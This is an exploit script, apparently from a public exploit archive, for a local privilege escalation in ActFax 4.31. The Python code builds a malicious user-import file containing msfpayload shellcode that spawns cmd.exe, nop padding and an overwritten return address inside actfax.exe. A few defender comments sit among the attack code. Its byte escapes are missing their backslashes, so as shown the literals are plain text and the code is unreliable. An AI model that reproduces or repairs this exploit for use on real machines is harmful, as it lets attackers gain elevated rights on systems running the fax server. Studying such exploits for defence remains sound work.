
ActFax 4.31 Local Privilege Escalation

Posted on 29 August 2012

#!/usr/bin/python
# Title: ActFax 4.31 Local Privilege Escalation Exploit
# Author: Craig Freyman (@cd1zz)
# Discovered: July 10, 2012
# Vendor Notified: June 12, 2012
# Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html
#
# Proof of concept that writes "pwnag3.exp": the ActFax user-export column
# header on one line, followed by a single oversized record.
#
# NOTE(review): this listing shows every byte escape without its backslash,
# so the literals below are plain ASCII text. They are reproduced exactly as
# they appear on the page.
#
# Defender notes:
#   * The saved return address is a fixed location inside actfax.exe (see the
#     comment on `eip`), which suggests the image is loaded at a predictable
#     base -- TODO confirm against the vendor binary.
#   * The record is far larger than any legitimate user row (6000 padding
#     units trail it), so an import file with one multi-kilobyte line after
#     the header is a usable detection signal.
#   * User-import files should be treated as untrusted input; restrict who
#     may import them into a service running with elevated rights.

# msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c
# [*] x86/alpha_upper succeeded with size 466 (iteration=1)
sc = "".join([
    "x89xe5xdbxcexd9x75xf4x58x50x59x49x49x49x49",
    "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56",
    "x58x34x41x50x30x41x33x48x48x30x41x30x30x41",
    "x42x41x41x42x54x41x41x51x32x41x42x32x42x42",
    "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx5a",
    "x48x4dx59x45x50x35x50x53x30x43x50x4dx59x4a",
    "x45x56x51x48x52x55x34x4cx4bx36x32x50x30x4c",
    "x4bx36x32x44x4cx4cx4bx30x52x52x34x4cx4bx34",
    "x32x56x48x34x4fx38x37x51x5ax37x56x46x51x4b",
    "x4fx46x51x39x50x4ex4cx47x4cx35x31x43x4cx43",
    "x32x36x4cx31x30x49x51x48x4fx34x4dx55x51x58",
    "x47x4ax42x4cx30x30x52x50x57x4cx4bx50x52x52",
    "x30x4cx4bx37x32x47x4cx55x51x58x50x4cx4bx47",
    "x30x33x48x4bx35x39x50x34x34x50x4ax33x31x4e",
    "x30x30x50x4cx4bx57x38x52x38x4cx4bx36x38x51",
    "x30x33x31x4ex33x4bx53x57x4cx57x39x4cx4bx56",
    "x54x4cx4bx53x31x48x56x36x51x4bx4fx46x51x4f",
    "x30x4ex4cx49x51x58x4fx54x4dx55x51x39x57x50",
    "x38x4bx50x32x55x5ax54x53x33x43x4dx4bx48x47",
    "x4bx33x4dx46x44x53x45x5ax42x36x38x4cx4bx30",
    "x58x47x54x45x51x49x43x45x36x4cx4bx44x4cx30",
    "x4bx4cx4bx36x38x55x4cx53x31x59x43x4cx4bx54",
    "x44x4cx4bx55x51x48x50x4cx49x31x54x47x54x36",
    "x44x51x4bx31x4bx55x31x36x39x31x4ax36x31x4b",
    "x4fx4dx30x51x48x51x4fx50x5ax4cx4bx55x42x5a",
    "x4bx4dx56x31x4dx52x4ax45x51x4cx4dx4dx55x4f",
    "x49x45x50x53x30x53x30x46x30x42x48x36x51x4c",
    "x4bx52x4fx4dx57x4bx4fx39x45x4fx4bx4ax50x4e",
    "x55x39x32x31x46x55x38x59x36x4dx45x4fx4dx4d",
    "x4dx4bx4fx58x55x57x4cx35x56x53x4cx44x4ax4d",
    "x50x4bx4bx4dx30x52x55x55x55x4fx4bx37x37x35",
    "x43x52x52x32x4fx43x5ax43x30x56x33x4bx4fx4e",
    "x35x32x43x32x4dx45x34x46x4ex35x35x43x48x45",
    "x35x33x30x41x41",
])

# Record layout: front padding, payload, filler up to offset 502, the
# overwritten return address, then trailing padding.
frontpad = "x90" * 10
eip = "x22x1bx40x00"  # 00401B22 RETN actfax.exe
backpad = "x90" * 6000
# A negative repeat count yields an empty string, so no filler is added when
# sc is already longer than 502 characters.
filler = "x90" * (502 - len(sc))
buff = "".join([frontpad, sc, filler, eip, backpad])

# Column header of the user-export format, copied verbatim from the listing.
export_header = (
    "User Name Entire User Name Password Alias-Names Group Direct Dialing Cost Account Permissions Comments User-Defined "
    "Predefined Settings Name 1 Name 2 Name 3 Name 4 Name 5 Department Attention of Phone 1 Phone 2 Fax Number E-Mail "
    "Coverpage Non-Windows Overlay Non-Windows Coverpage Windows Overlay Windows User-Defined Printer Settings Automatic Printing Outgoing "
    "Printer Name Outgoing Report Outgoing Automatic Printing Incoming Printer Name Incoming Report Incoming Notification Outgoing "
    "Email Outgoing Notification Incoming Email Incoming Attach Original Message User-Defined Archive Settings Export Outgoing "
    "Export Incoming Export-Path Mark as Readx0dx0a"
)

# Header line first, then the single oversized record and its line ending.
with open("pwnag3.exp", "w") as out:
    out.write(export_header + buff + "x0dx0a")

 
